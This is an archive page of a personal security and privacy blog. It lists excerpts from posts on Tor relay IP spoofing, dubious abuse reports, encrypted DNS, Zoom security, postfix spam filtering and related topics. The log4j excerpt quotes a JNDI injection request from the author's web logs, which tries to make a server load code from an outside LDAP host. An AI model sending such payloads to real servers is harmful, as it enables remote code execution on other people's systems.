This email just in from the Tor Project team. From: gus To: tor-relays@lists.torproject.org Subject: [tor-relays] Update: Tor relays source IPs spoofed to mass-scan port 22 Date: Thu, 7 Nov 2024 15:49:37 -0300 Hello everyone, I’m writing to share that the origin of the spoofed packets has been identified and successfully shut down today, thanks to …
Category: network (in)security
Permanent link to this article: https://baldric.net/2024/11/07/spoof-source-identified/
Nov 06 2024
watchdogcyberdefense.com are complete bozos
And may even be malicious. I have been receiving “malicious activity” reports from my hosting ISP about my Tor node at “tor1.rlogin.net” since about the end of October. So far I have received five such reports. Each report takes the following form: We have received an abuse report from abuse@watchdogcyberdefense.com for your IP address 95.216.198.252. …
Permanent link to this article: https://baldric.net/2024/11/06/watchdogcyberdefense-com-are-complete-bozos/
Feb 19 2023
lost car
Last month I posted an article about the press reports of Chinese software and hardware “found” in cars and how that could lead to the cars being tracked by the Chinese state (or other hostile agencies). I was therefore delighted to see the cartoon below in issue 1591 of Private Eye. I am indebted to …
Permanent link to this article: https://baldric.net/2023/02/19/lost-car/
Jan 16 2023
mobile (in)security
In my last post, an ex-GCHQ staffer is quoted as saying: “If you’re stepping back a bit and saying what cars do park outside GCHQ or somewhere like Porton Down then you have the pool of information there if you ever need it.” which got me wondering about how secure existing protective measures around …
Permanent link to this article: https://baldric.net/2023/01/16/mobile-insecurity/
Jan 16 2023
brakes-as-a-service
Some parts of the UK press have been reporting recently on the “discovery” of “hidden Chinese tracking devices” in a UK Government car (the original inews report is behind a paywall). The reports quote a “serving member of the British intelligence community” as telling the i newspaper: “It [the tracking SIM] gives the ability to survey …
Permanent link to this article: https://baldric.net/2023/01/16/brakes-as-a-service/
Dec 30 2022
signal failure
I use Signal as my instant messenger app on my ‘phone and I have the desktop version installed on my, well, desktop. Signal was written by the kind of people I trust and in my view it is infinitely better than plain unencrypted SMS and much better than any of the alternative IMs around (WhatsApp, …
Permanent link to this article: https://baldric.net/2022/12/30/signal-failure/
Dec 17 2021
log4j
I guess that there are a lot of busy sysadmins around at the moment. My web logs are full of crud like: “GET /$%7Bjndi:ldap://123.345.567:789/Exploit%7D” and much lengthier entries trying to exploit the log4j vulnerability. In my case (and for this instance) I’m not that bothered because, luckily, I don’t run Apache, or any of its …
Permanent link to this article: https://baldric.net/2021/12/17/log4j/
Oct 15 2021
zuck off facebook
Or how to block the entire Facebook network. In my last post on Facebook’s misfortunes I mentioned that my wife initially blamed me, assuming it was just local and that I had made some new change to my local network configuration. Now whilst I do actually bin some of Facebook’s more annoying subdomains (such as …
Permanent link to this article: https://baldric.net/2021/10/15/zuck-off-facebook/
May 27 2021
nothing to hide, nothing to fear
I recently came across this rather nice (spoof) NSA site describing the work of the Agency’s “Domestic Surveillance Directorate”. That Directorate supposedly exists to protect the citizen from the usual suspects (terrorists, paedophiles, criminals) and is tasked with data collection and analysis to support that end. The site says: “Our value is founded on a …
Permanent link to this article: https://baldric.net/2021/05/27/nothing-to-hide-nothing-to-fear/
Apr 29 2021
RIP Dan Kaminsky
I learned today that Dan Kaminsky died on Friday 23 April of complications arising from his diabetes. (I would probably have learned earlier if I followed Twitter, but I don’t.) He was only 42. I met Kaminsky at an MSRC Bluehat Forum in 2009. He was only 30 at the time, but already widely respected, …
Permanent link to this article: https://baldric.net/2021/04/29/rip-dan-kaminsky/
Nov 15 2020
comment spam irony
I am very careful about how, or even if, I allow comments on trivia. For example, I disallow all comments on any post after a set period of time; I also refuse all comments until I have had time to read and thus moderate them. This cuts down on the type of rubbish often seen …
Permanent link to this article: https://baldric.net/2020/11/15/comment-spam-irony/
Jun 06 2020
encrypting DNS on android
My previous two posts discussed the need for encrypted DNS and then how to do it on a Linux desktop. I do not have any Microsoft systems so I have no idea how to approach the problem if you use any form of Windows OS, nor do I have any Apple devices so I can’t …
Permanent link to this article: https://baldric.net/2020/06/06/encrypting-dns-on-android/
May 25 2020
encrypting DNS with dnsmasq and stubby
In my last post I explained that in order to better protect my privacy I wanted to move all my DNS requests from the existing system of clear text requests to one of encrypted requests. My existing system forwarded DNS requests from my internal dnsmasq caching servers to one of my (four) unbound resolvers and …
Permanent link to this article: https://baldric.net/2020/05/25/encrypting-dns-with-dnsmasq-and-stubby/
May 06 2020
encrypting DNS
Any casual reader of trivia will be aware that I care about my privacy and that I go to some lengths to maintain that privacy in the face of concerted attempts by ISPs, corporations, government agencies and others to subvert it. In particular I use personally managed OpenVPN servers at various locations to tunnel my …
Permanent link to this article: https://baldric.net/2020/05/06/encrypting-dns/
Apr 10 2020
zooming in on china
Since my previous post below, I have been reading up on Zoom as a company, its staffing and its worrying security (or rather lack of) track record. When I wrote the initial post I said that “Zoom is a US company funded almost entirely by venture capital. Its servers are US based.”. It appears that …
Permanent link to this article: https://baldric.net/2020/04/10/zooming-in-on-china/
Apr 03 2020
zooming in on cabinet
On Tuesday of this week, Boris Johnson tweeted a picture of what he called the UK’s “first ever digital Cabinet”. That picture (copy below) shows that the Cabinet meeting was held using Zoom – the sort of video conferencing software which is currently popular with business users forced to work at home during the Covid19 …
Permanent link to this article: https://baldric.net/2020/04/03/zooming-in-on-cabinet/
Mar 11 2020
beware the zombie apocalypse
Tom Scott is a young educational entertainer who publishes fairly regularly on YouTube. Back in mid 2004, whilst still a linguistics student at York, he managed to upset both the Home Office and the Cabinet Office by publishing a Department of Vague Paranoia website spoofing the rather po-faced official “Preparing for Emergencies” site. Tom’s …
Permanent link to this article: https://baldric.net/2020/03/11/beware-the-zombie-apocalypse/
Feb 27 2020
have I been pwned?
Well, I don’t think so. But for a while I was not entirely sure. Following the move last November of trivia from a VM on UK2’s datacentre in London to our new home on a faster VM on ITLDC’s network I have been making a variety of minor changes and doing some essential housework. One …
Permanent link to this article: https://baldric.net/2020/02/27/have-i-been-pwned/
Jan 22 2020
TLS certificate checks
My move of trivia to a new VM last December prompted me to look again at my server configuration. In particular I wanted to ensure that I was properly redirecting all HTTP requests to HTTPS and that the ciphers and protocols I support are as up to date and strong as possible. Mozilla offers a …
Permanent link to this article: https://baldric.net/2020/01/22/tls-certificate-checks/
Jul 07 2019
openvpn clients on pfsense
In my 2017 article on using OpenVPN on a SOHO router I said: “In testing, I’ve found that using a standard OpenVPN setup (using UDP as the transport) has only a negligible impact on my network usage – certainly much less than using Tor.” That was true back then but is unfortunately not so true …
Permanent link to this article: https://baldric.net/2019/07/07/openvpn-clients-on-pfsense/
Jun 26 2019
one unbound and you are free
I have written about my use of OpenVPN in several posts in the past, most latterly in May 2017 in my note about the Investigatory Powers (IP) Bill. In that post I noted that all the major ISPs would be expected to log all their customers’ internet connectivity and to retain such logs for so …
Permanent link to this article: https://baldric.net/2019/06/26/one-unbound-and-you-are-free/
Feb 16 2019
postfix sender restrictions – job NOT done
OK, I admit to being dumb. I got another scam email yesterday of the same formulation as the earlier ones (mail From: me@mydomain, To: me@mydomain) attempting to extort bitcoin from me. How? What had I missed this time? Well, this was slightly different. Checking the mail headers (and my logs) showed that the email had …
Permanent link to this article: https://baldric.net/2019/02/16/postfix-sender-restrictions-job-not-done/
Jan 24 2019
postfix sender restrictions
I mentioned in my previous post that I had recently received one of those scam emails designed to make the recipient think that their account has been compromised in some way and that, furthermore, that compromise has led to malware being installed which has spied on the user’s supposed porn habits. The email then attempts …
Permanent link to this article: https://baldric.net/2019/01/24/postfix-sender-restrictions/
Dec 11 2018
well I never
It’s not often that I find myself agreeing with GCHQ, but ex-GCHQ Director Robert Hannigan’s recent comments in an interview with the BBC Today programme struck a chord. Hannigan headed GCHQ from April 2014 until his resignation for family reasons last year. Whilst in post he pushed for greater transparency at the SIGINT agency. …
Permanent link to this article: https://baldric.net/2018/12/11/well-i-never/